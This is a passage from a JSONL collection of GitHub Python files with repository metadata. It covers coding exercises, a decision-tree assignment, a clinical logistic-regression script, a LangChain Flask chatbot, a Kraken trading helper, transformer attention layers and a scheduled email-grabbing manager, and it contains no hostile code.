sum(set1)*n\n --> sum(list1) == sum(set1)*n - (n-1)*c\n --> c = (sum(set1)*n - sum(list1)) / (n-1)\n \"\"\" # NOQA\n n = int(input())\n list1 = list(map(int, input().split()))\n set1 = set(list1)\n captain_room_numer = int((sum(set1) * n - sum(list1)) / (n - 1))\n print(captain_room_numer)\n\n\nif __name__ == '__main__':\n find_captain_room_number()\n","repo_name":"bacdoxuan/Hacker_Rank_Python","sub_path":"chap4_Sets/ex11_find_captain_room_number.py","file_name":"ex11_find_captain_room_number.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2722156845","text":"# 变量赋值为一个字符串,\\t是制表符的意思,即缩进一个tab制表符。\\n是换行的意思,\\\\转义为反斜杠\\,还有如\\a,\\v等转义ascii码\\\"转义双引号等\r\ntabby_cat = \"\\ti'm tabbed in.\"\r\npersian_cat = \"i'm split\\non a line.\"\r\nbackslash_cat = \"i'm \\\\ a \\\\ cat.\"\r\n\r\nfat_cat = \"\"\"\r\ni'll do a list:\r\n\\t* cat food\r\n\\t* fishies\r\n\\t* catnip\\n\\t* grass\r\n\"\"\"\r\n\r\nprint(tabby_cat)\r\nprint(persian_cat)\r\nprint(backslash_cat)\r\nprint(fat_cat)\r\n","repo_name":"xiaoshefengsheng/lpthw","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12626344112","text":"import numpy as np\r\nfrom typing import List\r\nfrom classifier import Classifier\r\n\r\nclass DecisionTree(Classifier):\r\n\tdef __init__(self):\r\n\t\tself.clf_name = \"DecisionTree\"\r\n\t\tself.root_node = None\r\n\r\n\tdef train(self, features: List[List[float]], labels: List[int]):\r\n\t\t# init.\r\n\t\tassert(len(features) > 0)\r\n\t\tself.feautre_dim = len(features[0])\r\n\t\tnum_cls = np.max(labels)+1\r\n\r\n\t\t# build the tree\r\n\t\tself.root_node = TreeNode(features, labels, num_cls)\r\n\t\tif self.root_node.splittable:\r\n\t\t\tself.root_node.split()\r\n\r\n\t\treturn\r\n\t\t\r\n\tdef predict(self, features: List[List[float]]) -> List[int]:\r\n\t\ty_pred = []\r\n\t\tfor feature in features:\r\n\t\t\ty_pred.append(self.root_node.predict(feature))\r\n\t\treturn y_pred\r\n\r\n\tdef print_tree(self, node=None, name='node 0', indent=''):\r\n\t\tif node is None:\r\n\t\t\tnode = self.root_node\r\n\t\tprint(name + '{')\r\n\t\tif node.splittable:\r\n\t\t\tprint(indent + ' split by dim {:d}'.format(node.dim_split))\r\n\t\t\tfor idx_child, child in enumerate(node.children):\r\n\t\t\t\tself.print_tree(node=child, name= ' '+name+'/'+str(idx_child), indent=indent+' ')\r\n\t\telse:\r\n\t\t\tprint(indent + ' cls', node.cls_max)\r\n\t\tprint(indent+'}')\r\n\r\n\r\nclass TreeNode(object):\r\n\tdef __init__(self, features: List[List[float]], labels: List[int], num_cls: int):\r\n\t\t# print(features)\r\n\t\t# print(labels)\r\n\t\t# print(num_cls)\r\n\t\tself.features = features\r\n\t\tself.labels = labels\r\n\t\tself.children = []\r\n\t\tself.num_cls = num_cls\r\n\r\n\t\tcount_max = 0\r\n\t\tfor label in np.unique(labels):\r\n\t\t\tif self.labels.count(label) > count_max:\r\n\t\t\t\tcount_max = labels.count(label)\r\n\t\t\t\tself.cls_max = label # majority of current node\r\n\r\n\t\tif len(np.unique(labels)) < 2:\r\n\t\t\tself.splittable = False\r\n\t\telse:\r\n\t\t\tself.splittable = True\r\n\t\tif len(self.features) ==0:\r\n\t\t\tself.splittable = False\r\n\t\telse:\r\n\t\t\tself.splittable = True\r\n\r\n\t\tself.dim_split = None # the dim of feature to be splitted\r\n\r\n\t\tself.feature_uniq_split = None # the feature to be splitted\r\n\r\n\r\n\tdef split(self):\r\n\t\tdef conditional_entropy(branches: List[List[int]]) -> float:\r\n\t\t\t'''\r\n\t\t\tbranches: C x B array, \r\n\t\t\t\t\t C is the number of classes,\r\n\t\t\t\t\t B is the number of branches\r\n\t\t\t\t\t it stores the number of\r\n\t\t\t\t\t Corresponding training samples\r\n\t\t\t\t\t eg:[[2,2],[4,0]]\r\n\t\t\t'''\r\n\t\t\t########################################################\r\n\t\t\t# TODO: compute the conditional entropy\r\n\t\t\t########################################################\r\n\t\t\tbran=np.array(branches)\r\n\t\t\teleBranch=np.sum(bran,axis=0)\r\n\t\t\tnoClasses=len(branches)\r\n\t\t\tnoBranches=len(branches[0])\r\n\t\t\ttotalattr=np.sum(eleBranch)\r\n\t\t\tval=[]\r\n\t\t\tfor i in range(0,noBranches):\r\n\t\t\t\tsum=0\r\n\t\t\t\tfor j in range(0,noClasses):\r\n\t\t\t\t\tif(branches[j][i]==0):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tsum+=(branches[j][i]/eleBranch[i])*np.log2(branches[j][i]/eleBranch[i])\r\n\t\t\t\tval.append(sum)\r\n\t\t\tvalue=0\r\n\t\t\tfor i in range(0,len(eleBranch)):\r\n\t\t\t\tvalue+=(eleBranch[i]/totalattr)*-1*val[i]\r\n\t\t\treturn value\r\n\r\n\r\n\r\n\t\tfet={}\r\n\t\tfor idx_dim in range(len(self.features[0])):\r\n\t\t\t############################################################\r\n\t\t\t# TODO: compare each split using conditional entropy\r\n\t\t\t# find the best split\r\n\t\t\t############################################################\r\n\t\t\t# print(\"hai\",idx_dim)\r\n\t\t\tlabel=self.labels[:]\r\n\t\t\tfeat = np.array(self.features)[:,idx_dim]\r\n\t\t\tkeys=np.unique(np.array(feat))\r\n\t\t\t# print(keys)\r\n\t\t\tlabuniq=np.unique(self.labels)\r\n\t\t\tret=[]\r\n\t\t\tfor i in range(len(labuniq)):\r\n\t\t\t\tret.append([])\r\n\t\t\tdim=len(keys)\r\n\t\t\tfor i in keys.tolist():\r\n\t\t\t\tindices = np.where(feat==i)[0]\r\n\t\t\t\tlab=[]\r\n\t\t\t\tfor j in indices:\r\n\t\t\t\t\tlab.append(label[j])\r\n\t\t\t\t\t# label.remove(j)\r\n\t\t\t\tunique, counts = np.unique(lab, return_counts=True)\r\n\t\t\t\tfor k in range(len(ret)):\r\n\t\t\t\t\tif( k in unique):\r\n\r\n\t\t\t\t\t\tret[k].append(counts[int(np.where(unique==k)[0])])\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tret[k].append(0)\r\n\t\t\t\t# print(ret)\r\n\t\t\tfet[idx_dim]=conditional_entropy(ret)\r\n\t\t# print(fet)\r\n\r\n\r\n\r\n\r\n\t\tkey=0\r\n\t\tmax=0\r\n\t\tfor i in fet:\r\n\t\t\tif(fet[i]>max):\r\n\t\t\t\tmax=fet[i]\r\n\t\t\t\tkey=i\r\n\t\tself.dim_split = key\r\n\r\n\t\t# for i in range(len(self.features[0])):\r\n\t\tfeat = np.array(self.features)[:, key]\r\n\t\tkeys = np.unique(np.array(feat))\r\n\t\tabc=[]\r\n\t\t# self.feature_uniq_split=keys.tolist()[:]\r\n\t\tfor m in keys:\r\n\t\t\tf1 = []\r\n\t\t\tlab=[]\r\n\t\t\tfor j in range(0,len(self.features)):\r\n\t\t\t\tinn=[]\r\n\t\t\t\t# for k in range(0,len(self.features[0])):\r\n\t\t\t\tif(self.features[j][self.dim_split]==m):\r\n\t\t\t\t\tinn=np.array(self.features[j]).tolist()\r\n\t\t\t\t\tlab.append(self.labels[j])\r\n\t\t\t\t\tinn.remove(m)\r\n\t\t\t\t\tif(len(inn)==0):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tf1.append(inn)\r\n\r\n\t\t\tlen1=len(np.unique(np.array(lab)))\r\n\t\t\t# if(len(f1)==0):\r\n\t\t\t\t# continue\r\n\t\t\tabc.append(m)\r\n\r\n\t\t\tself.children.append(TreeNode(features=f1,labels=lab,num_cls=len1))\r\n\t\t\t# print(m)\r\n\t\t\t# print(f1)\r\n\t\t\t# print(lab)\r\n\t\tself.feature_uniq_split=abc[:]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t############################################################\r\n\t\t# TODO: split the node, add child nodes\r\n\t\t############################################################\r\n\r\n\r\n\r\n\r\n\t\t# split the child nodes\r\n\t\tfor child in self.children:\r\n\t\t\tif child.splittable:\r\n\t\t\t\tchild.split()\r\n\r\n\t\treturn\r\n\r\n\tdef predict(self, feature: List[int]) -> int:\r\n\t\tif self.splittable:\r\n\t\t\t# print(feature)\r\n\t\t\t# print(self.dim_split)\r\n\t\t\t# print(self.feature_uniq_split)\r\n\t\t\tif(feature[self.dim_split] not in self.feature_uniq_split ):\r\n\t\t\t\treturn self.cls_max\r\n\t\t\tidx_child = self.feature_uniq_split.index(feature[self.dim_split])\r\n\t\t\t# print(idx_child)\r\n\t\t\t# print(self.children)\r\n\t\t\treturn self.children[idx_child].predict(feature)\r\n\t\telse:\r\n\t\t\treturn self.cls_max\r\n\r\n\r\n\r\n","repo_name":"salalithmantha/Machine-Learning","sub_path":"Assignment-3/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71159041368","text":"###############################################################################################\n#Aim: coefs. and intercepts for the LLR models\n#Description: To determine the coefs. and intercepts of the\n# 1) NSCLC-specific LLR6 model\n# 2) NSCLC-specific LLR5noChemo model\n# 3) NSCLC-specific LLR2 model\n# with 10k-repeat train-test splitting (80%:20%).\n#\n#Run command, e.g.: python 08_4.NSCLC_LLRx_10k_ParamCalculate.py LLR6\n###############################################################################################\n\n\nimport sys\nimport time\nimport pandas as pd\nimport numpy as np\nimport sklearn.neighbors._base\nsys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom collections import Counter\nimport copy\nfrom scipy import stats\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n\n CPU_num = -1\n randomSeed = 1\n resampleNUM = 10000\n train_size = 0.8\n\n phenoNA = 'Response'\n LLRmodelNA = sys.argv[1] # 'LLR6' 'LLR5noChemo' 'LLR2'\n if LLRmodelNA == 'LLR6':\n featuresNA = ['TMB', 'PDL1_TPS(%)', 'Chemo_before_IO', 'Albumin', 'NLR', 'Age']\n elif LLRmodelNA == 'LLR5noChemo':\n featuresNA = ['TMB', 'PDL1_TPS(%)', 'Albumin', 'NLR', 'Age']\n elif LLRmodelNA == 'LLR2':\n featuresNA = ['TMB', 'PDL1_TPS(%)']\n xy_colNAs = featuresNA + [phenoNA]\n\n print('Raw data processing ...')\n dataALL_fn = '../../02.Input/features_phenotype_allDatasets.xlsx'\n dataChowell_Train0 = pd.read_excel(dataALL_fn, sheet_name='Chowell2015-2017', index_col=0)\n dataChowell_Train1 = pd.read_excel(dataALL_fn, sheet_name='Chowell2018', index_col=0)\n\n dataChowell_Train0 = pd.concat([dataChowell_Train0,dataChowell_Train1],axis=0)\n\n dataChowell_Train0 = dataChowell_Train0.loc[dataChowell_Train0['CancerType']=='NSCLC',]\n dataChowell_Train0 = dataChowell_Train0[xy_colNAs].dropna(axis=0)\n dataChowell_Train = copy.deepcopy(dataChowell_Train0)\n\n # truncate extreme values of features\n TMB_upper = 50\n Age_upper = 85\n NLR_upper = 25\n try:\n dataChowell_Train['TMB'] = [c if c < TMB_upper else TMB_upper for c in dataChowell_Train0['TMB']]\n except:\n 1\n try:\n dataChowell_Train['Age'] = [c if c < Age_upper else Age_upper for c in dataChowell_Train0['Age']]\n except:\n 1\n try:\n dataChowell_Train['NLR'] = [c if c < NLR_upper else NLR_upper for c in dataChowell_Train0['NLR']]\n except:\n 1\n print('Patient number (training): ', dataChowell_Train0.shape[0])\n counter = Counter(dataChowell_Train0[phenoNA]) # count examples in each class\n pos_weight = counter[0] / counter[1] # estimate scale_pos_weight value\n print(' Phenotype name: ', phenoNA)\n print(' Negative/Positive samples in training set: ', pos_weight)\n\n ############## 10000-replicate random data splitting for model training and evaluation ############\n LR_params10000 = [[], [], [], [], []] # norm_mean, norm_std, coefs, interc\n param_dict_LR6 = {'penalty': 'l1', 'C': 0.1, 'class_weight': 'balanced', 'solver': 'saga', 'random_state': randomSeed}\n\n test_size = 1 - train_size\n AUC_score_dict = {}\n for resampling_i in range(resampleNUM):\n data_train, data_test = train_test_split(dataChowell_Train, test_size=test_size, random_state=resampling_i*randomSeed,\n stratify=None) # stratify=None\n y_train = data_train[phenoNA]\n y_test = data_test[phenoNA]\n x_train6LR = pd.DataFrame(data_train, columns=featuresNA)\n x_test6LR = pd.DataFrame(data_test, columns=featuresNA)\n\n scaler_sd = StandardScaler() # StandardScaler()\n x_train6LR = scaler_sd.fit_transform(x_train6LR)\n LR_params10000[0].append(list(scaler_sd.mean_))\n LR_params10000[1].append(list(scaler_sd.scale_))\n x_test6LR = scaler_sd.transform(x_test6LR)\n\n ############# LASSO Logistic Regression model #############\n clf = linear_model.LogisticRegression(**param_dict_LR6).fit(x_train6LR, y_train)\n LR_params10000[2].append(list(clf.coef_[0]))\n LR_params10000[3].append(list(clf.intercept_))\n\n predictions = clf.predict(x_train6LR)\n params = np.append(clf.intercept_, clf.coef_)\n newX = np.append(np.ones((len(x_train6LR), 1)), x_train6LR, axis=1)\n MSE = (sum((y_train - predictions) ** 2)) / (len(newX) - len(newX[0]))\n var_b = MSE * (np.linalg.inv(np.dot(newX.T, newX)).diagonal())\n sd_b = np.sqrt(var_b)\n ts_b = params / sd_b\n p_values = [2 * (1 - stats.t.cdf(np.abs(i), (len(newX) - len(newX[0])))) for i in ts_b]\n LR_params10000[4].append(p_values[1:] + [p_values[0]])\n\n fnOut = open('../../03.Results/16features/NSCLC/NSCLC_'+LLRmodelNA+'_10k_ParamCalculate.txt', 'w', buffering=1)\n for i in range(5):\n LR_params10000[i] = list(zip(*LR_params10000[i]))\n LR_params10000[i] = [np.mean(c) for c in LR_params10000[i]]\n print('coef : ', [round(c,4) for c in LR_params10000[2]])\n print('intercept: ', [round(c,4) for c in LR_params10000[3]])\n print('p_val: ', [round(c, 4) for c in LR_params10000[4]])\n fnOut.write('LLR_mean\\t' + '\\t'.join([str(c) for c in LR_params10000[0]]) + '\\n')\n fnOut.write('LLR_scale\\t' + '\\t'.join([str(c) for c in LR_params10000[1]]) + '\\n')\n fnOut.write('LLR_coef\\t' + '\\t'.join([str(c) for c in LR_params10000[2]]) + '\\n')\n fnOut.write('LLR_intercept\\t' + '\\t'.join([str(c) for c in LR_params10000[3]]) + '\\n')\n fnOut.write('LLR_pval\\t' + '\\t'.join([str(c) for c in LR_params10000[4]]) + '\\n')\n fnOut.close()\n\n print('All done! Time used: ', time.time() - start_time)","repo_name":"rootchang/ICBpredictor","sub_path":"code/08_4.NSCLC_LLRx_10k_ParamCalculate.py","file_name":"08_4.NSCLC_LLRx_10k_ParamCalculate.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71012950487","text":"from flask import Flask, request\nimport os\nimport sys\n\nfrom llama_index import SimpleDirectoryReader, GPTListIndex, GPTSimpleVectorIndex\nfrom llama_index import LLMPredictor, PromptHelper\n\nfrom langchain import ConversationChain, LLMChain, PromptTemplate\nfrom langchain import OpenAI\nfrom langchain.memory import ConversationBufferWindowMemory\nfrom langchain.agents import initialize_agent, Tool\nfrom langchain.chat_models import ChatOpenAI\n\napp = Flask(__name__)\n\n## Chat tooling\n\n# llm=ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\", max_tokens=1024)\nllm=OpenAI(temperature=0, model_name=\"text-davinci-003\", max_tokens=1024)\nmemory = ConversationBufferWindowMemory(k=2, memory_key='chat_history', return_messages=True)\n\nconstitution_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/01Constitution.json')\nlubus_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/02Lubus.json')\ncovid_index = GPTSimpleVectorIndex.load_from_disk('./app/indexes/03Covid.json')\n\ntools = [\n Tool(\n name=\"constitution_index\",\n func=lambda q: constitution_index.query(q),\n description=f\"Useful when you want answer questions about the Constitution.\",\n ),\n Tool(\n name=\"lubus_index\",\n func=lambda q: lubus_index.query(q),\n description=f\"Useful when you want answer questions about the Lubus.\",\n ),\n Tool(\n name=\"covid_index\",\n func=lambda q: covid_index.query(q),\n description=f\"Useful when you want answer questions about the Covid.\",\n ),\n]\n\nagent_chain = initialize_agent(tools, llm, agent=\"zero-shot-react-description\", verbose=False, memory=memory, max_iterations=6, early_stopping_method=\"generate\")\n\ndef fetch_query_data_from_openai(chat_query): # this is the home page function that generates the page code\n result = agent_chain.run(input=chat_query)\n print(result)\n # result = result.replace('\"', '\\\\\"').replace('\\n', '\\\\n')\n return result\n\n@app.route('/') # this is the home page route\ndef hello_world(): # this is the home page function that generates the page code\n return \"Hello world!\"\n\n@app.route('/chatbot') \ndef openai_api_call(): # this is the home page function that generates the page code\n chat_query = request.args.get('chat_query')\n result = fetch_query_data_from_openai(chat_query)\n return {\n \"fulfillmentText\":\n result,\n \"source\":\n \"webhookdata\"\n }\n return '200'\n\n@app.route('/webhook', methods=['POST'])\nasync def webhook():\n try:\n req = request.get_json(silent=True, force=True)\n chat_query = req.get('queryText')\n result = fetch_query_data_from_openai(chat_query)\n\n return {\n \"fulfillmentText\":\n result,\n \"source\":\n \"webhookdata\"\n }\n return '200'\n except Exception as e:\n print('error',e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print('oops',exc_type, fname, exc_tb.tb_lineno)\n return '400'\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=os.getenv(\"PORT\", default=5001))","repo_name":"gaurangAkulkarni/chatgpt","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42045322151","text":"from __future__ import annotations\nimport time\n\nfrom typing import Dict, Type\n\nfrom Structures.Asset import Asset\nimport Structures.AssetPair as AP\nfrom Structures.KrakenAPI import KrakenAPI\nfrom Structures.Error import Error, ErrorType\nimport Structures.Strategy as Strategy\n\nfrom Utils.StringManipulation import tabulate\n\nclass AssetHandler:\n\n \"\"\"\n This class is used to handle a list of assets, it keeps track of all\n the existing assets and the values associated to them.\n \"\"\"\n\n def __init__(self : AssetHandler) -> AssetHandler:\n \"\"\"\n Creates a new asset handler.\n \"\"\"\n self.assets : Dict[str, Asset] = {}\n\n # generic information about the market\n self.pairs : Dict[str, AP.AssetPair] = {}\n self.usd_pairs : Dict[str, AP.AssetPair] = {}\n\n self.log_file : str = \"logs.txt\"\n\n def update_assets(self : AssetHandler, kapi : KrakenAPI, *, asset : str = None) -> None:\n \"\"\"\n This methods updates the list of existing assets.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n result = kapi.get_assets(asset=asset)\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n for asset in result:\n self.assets[asset] = Asset.build_asset(asset, result[asset])\n\n def update_tradable_assets(self : AssetHandler, kapi : KrakenAPI, *, pair : str = None) -> None:\n \"\"\"\n This methods updates the list of existing tradable assets.\n It does not update the Assets, their value in the trade whatsoever.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n result = kapi.get_tradable_assets(pair=pair)\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n for pair in result:\n self.pairs[pair] = AP.AssetPair.build_asset_pair(pair, self, result[pair])\n\n if (self.pairs[pair].base.name == \"ZUSD\" or\n self.pairs[pair].quote.name == \"ZUSD\" or\n self.pairs[pair].quote.name == \"USD\" or\n self.pairs[pair].base.name == \"USD\"):\n\n self.usd_pairs[pair] = self.pairs[pair]\n\n def update_usd_tradable_prices(self : AssetHandler, kapi : KrakenAPI, *, pair : str = None, total : int = -1) -> None:\n \"\"\"\n Updates the value of the trades of tradable USD assets.\n\n :param kapi: The already initialized KrakenAPI.\n \"\"\"\n if pair != None:\n result = kapi.public_kraken_request(f\"https://api.kraken.com/0/public/OHLC?pair={pair}&interval=5\")\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(str(result.error.value) + \" : \" + str(result.msg) + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n self.pairs[pair].update_prices(result[pair])\n self.pairs[pair].update_data(self.pairs[pair].quote.name != \"ZUSD\" and self.pairs[pair].quote.name != \"USD\")\n else:\n for p in self.usd_pairs:\n # print(p)\n result = kapi.public_kraken_request(f\"https://api.kraken.com/0/public/OHLC?pair={p}&interval=5\")\n\n if isinstance(result, Error):\n print(\"An error occurred!\")\n with open(self.log_file, \"a\") as file:\n file.write(result.error.value + \" : \" + result.msg + \"\\n\")\n if result.error == ErrorType.RATE_LIMIT:\n time.sleep(200)\n return None\n\n self.pairs[p].update_prices(result[p])\n self.pairs[p].update_data(self.pairs[p].quote.name != \"ZUSD\" and self.pairs[p].quote.name != \"USD\")\n\n total -= 1\n if total == 0: break\n\n def get_best_usd_pair(self : AssetHandler, bs : Type[Strategy.BuyStrategy]) -> AP.AssetPair:\n \"\"\"\n Returns the best USD pair of tradable assets.\n\n :param strategy: The strategy to apply, to decide which asset\n is best suited to be bought. This strategy should be a function\n that takes as input an AssetPair object and returns a floating \n point value.\n \n :returns: The best asset to buy right now.\n \"\"\"\n best_pair : AP.AssetPair = None\n max_val = None\n best_pair = None\n\n for pair in self.usd_pairs:\n if not self.usd_pairs[pair].is_init: continue\n p = self.usd_pairs[pair]\n res = bs.strategy(p)\n \n if max_val == None or max_val < res:\n max_val = res if max_val == None else max(res, max_val)\n best_pair = p\n\n return best_pair\n\n def __str__(self : AssetHandler) -> str:\n s = \"Assets:\\n\"\n for element in self.assets:\n s += f\"Asset {self.assets[element].name}: \\n\"\n s += tabulate(str(self.assets[element])) + \"\\n\"\n s += \"-------------------------------------------------\\n\"\n \n for element in self.pairs:\n s += f\"Asset {self.pairs[element].name}: \\n\"\n s += tabulate(str(self.pairs[element])) + \"\\n\"\n s += \"-------------------------------------------------\\n\"\n\n for element in self.usd_pairs:\n s += f\"Asset {self.usd_pairs[element].name}: \\n\"\n s += tabulate(str(self.usd_pairs[element])) + \"\\n\"\n s += \"-------------------------------------------------\\n\"\n\n return s.rstrip(\"\\n\")","repo_name":"Leopounet/BotKraken","sub_path":"src/Structures/AssetHandler.py","file_name":"AssetHandler.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22407802896","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .modules import ScaledDotProductAttention\n\nclass MultiHeadAttention(nn.Module):\n ''' Multi-Head Attention module '''\n\n def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):\n super().__init__()\n\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n\n self.w_qs = nn.Linear(d_model, n_head * d_k, bias=False) # in_features=512, out_features=512\n self.w_ks = nn.Linear(d_model, n_head * d_k, bias=False) # in_features=512, out_features=512\n self.w_vs = nn.Linear(d_model, n_head * d_v, bias=False) # in_features=512, out_features=512\n self.fc = nn.Linear(n_head * d_v, d_model, bias=False)\n\n self.attention = ScaledDotProductAttention(temperature=d_k ** 0.5)\n\n self.dropout = nn.Dropout(dropout)\n self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n\n\n def forward(self, q, k, v, mask=None):\n\n d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n len_q, len_k, len_v = q.size(1), k.size(1), v.size(1)\n\n residual = q\n\n # Pass through the pre-attention projection: b x lq x (n*dv)\n # Separate different heads: b x lq x n x dv\n q = self.w_qs(q).view(-1, len_q, n_head, d_k) # 对输入做线型变换后得到Q矩阵:36个词,每个词有8个头,每个头有64维,转为多头的格式(256, 36, 8, 64),注意这里没有直接展开成(256,8,36,64)是因为linear输出的是dk*n_head,需要通过转置实现\n k = self.w_ks(k).view(-1, len_k, n_head, d_k) # K\n v = self.w_vs(v).view(-1, len_v, n_head, d_v) # V\n\n # Transpose for attention dot product: b x n x lq x dv\n q, k, v = q.transpose(1, 2), k.transpose(1, 2), v.transpose(1, 2) # 这里转为共8个头,每个头有36*64, (256, 8, 36, 64)\n\n if mask is not None:\n mask = mask.unsqueeze(1) # For head axis broadcasting. # encoder时,(256,1,36) → (256,1,1,36),broadcast的规则是有一个轴等于1可以自动broadcast,decoder时,[256,32,32] → [256,1,32,32]\n\n q, attn = self.attention(q, k, v, mask=mask) # q = [256, 8, 36, 64], attn=[256, 8, 36, 36]\n\n # Transpose to move the head dimension back: b x lq x n x dv\n # Combine the last two dimensions to concatenate all the heads together: b x lq x (n*dv)\n q = q.transpose(1, 2).contiguous().view(-1, len_q, self.n_head * self.d_v)\n q = self.dropout(self.fc(q))\n q += residual\n\n q = self.layer_norm(q)\n\n return q, attn\n\n\nclass PositionwiseFeedForward(nn.Module):\n ''' A two-feed-forward-layer module '''\n\n def __init__(self, d_in, d_hid, dropout=0.1):\n super().__init__()\n self.w_1 = nn.Linear(d_in, d_hid) # position-wise # position-wise是指36长度的序列每个位置的词做线型层,即8个头每个头64维的矢量共512维输入矩阵\n self.w_2 = nn.Linear(d_hid, d_in) # position-wise\n self.layer_norm = nn.LayerNorm(d_in, eps=1e-6)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n\n residual = x\n\n x = self.w_2(F.relu(self.w_1(x)))\n x = self.dropout(x)\n x += residual\n\n x = self.layer_norm(x)\n\n return x\n","repo_name":"initxu/naranker","sub_path":"ranker/sublayers.py","file_name":"sublayers.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43721245830","text":"import os\nimport shutil\nfrom threading import Thread\nfrom core.daemon import get_config, set_config, logging\nfrom datetime import datetime\nfrom core.grabber import Grabbing\nfrom time import sleep\nfrom grabber.models.Emails import Zips\n\n'''\n Проверяет время и в указанное время запускает скачивание(grabber.py).\n ClearZips удаляет старые архивы после скачивания.\n'''\n\n\nclass GrabManager(Thread):\n\n def __init__(self):\n Thread.__init__(self)\n\n def run(self):\n logging('GrabManager', 'run...')\n grab_managing()\n\n\ndef grab_managing():\n logging('GrabManager', 'START')\n if get_config('grab_management') == '1':\n return\n set_config('grab_management', '1')\n # scan_time = get_config('scan_time')\n try:\n while True:\n if datetime.now().time().strftime('%H:%M') == get_config('scan_time') and get_config('grabbing') == '0':\n grabber = Grabbing()\n grabber.start()\n sleep(58)\n finally:\n set_config('grab_management', '0')\n\n\nclass ClearZips(Thread):\n\n def __init__(self):\n Thread.__init__(self)\n\n def run(self):\n clear_zips()\n\n\ndef clear_zips():\n dirs = os.listdir('emails')\n for the_dir in dirs:\n shutil.rmtree(os.path.join('emails', the_dir), ignore_errors=True)\n try:\n Zips.objects.all().delete()\n except Zips.DoesNotExist:\n return 'error'\n return 'ok'\n","repo_name":"atabayev/asar","sub_path":"core/grab_manager.py","file_name":"grab_manager.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17142044567","text":"# Python version 3.11.2\nimport os\n\n\ndef rename_files(path:str, new_img_name):\n \"\"\" This function will rename the specified file to the specified name\n Args:\n path (str): pass your path where your files are stored\n new_img_name (_type_): give the name of the image to rename\n \"\"\"\n \n try:\n img_list = os.listdir(path=path)\n \n for i, img_name in enumerate(img_list):\n extension_name = img_name.split('.')[1]\n old_img_path = os.path.join(path, img_name)\n new_img_path = os.path.join(path, f\"{new_img_name}{i}.{extension_name}\")\n os.rename(old_img_path, new_img_path)\n print(\"Successfully renamed\")\n except Exception as e:\n print(\"Opps!! \", e)\n print(\"Please enter the valid path!!\")\n\n\nif __name__ == \"__main__\":\n rename_files(path=\"C:\\\\Users\\\\alami\\\\Downloads\\\\New folder\", new_img_name=\"BangladeshFlag\")","repo_name":"alaminbhuyan/Python-Custom-Module","sub_path":"Rename Files Name/FilesRename.py","file_name":"FilesRename.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231515190","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 25.py\n@time: 2019/1/30 030 15:13\n@desc:给出一个链表,每 k 个节点一组进行翻转,并返回翻转后的链表。\nk 是一个正整数,它的值小于或等于链表的长度。如果节点总数不是 k 的整数倍,那么将最后剩余节点保持原有顺序。\n采取24题列表法\n'''\nclass ListNode:\n def __init__(self, x=None):\n self.val = x\n self.next = None\n\ndef reverseKGroup(head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n nodes = []\n out_nodes = []\n if head != None and head.next != None:\n curr = head\n while curr != None:\n nodes.append(curr)\n curr = curr.next\n max_len = len(nodes)\n if max_len < k:\n return head\n if max_len > k:\n if max_len % k == 0:\n times = max_len // k - 1\n 